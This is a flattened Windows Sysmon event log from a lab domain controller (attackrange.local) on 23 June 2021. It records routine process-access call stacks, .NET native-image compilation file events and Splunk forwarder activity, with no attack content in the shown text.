21:06:49.962{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A269-60D3-0C05-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:49.946{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A269-60D3-0C05-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.946{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A269-60D3-0C05-00000000CF01}6332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 
11241100x800000000000000022384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:49.884{4DB9351A-A269-60D3-0905-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\162c-0\XamlBuildTask.dll2021-06-23 21:06:49.884 23542300x800000000000000022383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.868{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB571F5390F2A592975D660269DC824C,SHA256=9239245E4D18102E7D69F9A34DD45DFCC8E9B6651A75811D7146542A1C8A52D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.785{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 
10341000x800000000000000022381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.785{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:49.773{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:49.773{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x800000000000000022378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:49.773{4DB9351A-9F49-60D3-DF00-00000000CF01}5948ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\Y4WA5EJR\microsoft.windows[1].xmlMD5=07742C9FE0A4AA03CF91B78A3EAD6FD5,SHA256=27BB4ACB6326CFA13FB3D021E3763BD67CB313693BE92D441DC2717E4CBBB5F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.577{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-1005-00000000CF01}3752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022409Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.577{4DB9351A-A26A-60D3-0F05-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OB0G31BQYF\System.Drawing.ni.dll.auxMD5=94D7302DE14F5BC21132AAB72344F55D,SHA256=C435218B6BC6FCA23400AC3B79586384E14A701303E26316A5DB4E3BEBC4C678,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022408Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.577{4DB9351A-A26A-60D3-0F05-00000000CF01}5848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OB0G31BQYF\System.Drawing.ni.dllMD5=040BB2C65CB0EBE3C700E176C7829680,SHA256=BDD599E392F11FF594343BEB358A5732A2CB0C2C703CC0458E14F3ACFD727462,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.483{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26A-60D3-0F05-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.468{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A26A-60D3-0F05-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.468{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-0F05-00000000CF01}5848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.468{4DB9351A-A26A-60D3-0E05-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C8KAZE7YJ3\System.Configuration.ni.dll.auxMD5=A2EFEE5D60AD20F21CC1C7AF4F7B0283,SHA256=F952C1C062215AB5710805169548783F652AD66CD29F6AB95FB6E3B24FC96AB5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000022403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.468{4DB9351A-A26A-60D3-0E05-00000000CF01}5096NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\C8KAZE7YJ3\System.Configuration.ni.dllMD5=A7AEC406B4A1D27E5B604FA1014D2615,SHA256=1A93DE657BC2DB27A9597B68E8B9749FD0C52FBF101B5B20C014D0E2A055D9A8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.405{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E106202512D9210A233A7C61966506B6,SHA256=4E89EAB0B1DE3EF1B564172CB1369DDD7FE115DDEC59A7E56458DE461575B8A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.374{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26A-60D3-0E05-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000022400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.343{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26A-60D3-0E05-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.343{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26A-60D3-0E05-00000000CF01}5096C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 11241100x800000000000000022398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:50.249{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\16c0-0\XsdBuildTask.dll2021-06-23 21:06:50.249 23542300x800000000000000022397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.217{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=626AFAD9846CD4117BC96A1C4127B93E,SHA256=FF4FA84FFB6DB7497BFECAA6C56A2D8DB0C1A37FE35D7FD6596BAA7AE12976DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:50.134{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26A-60D3-0D05-00000000CF01}5824C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022395Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7765472C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022394Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:06:50.134{4DB9351A-9F2B-60D3-C400-00000000CF01}7764780C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022393Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
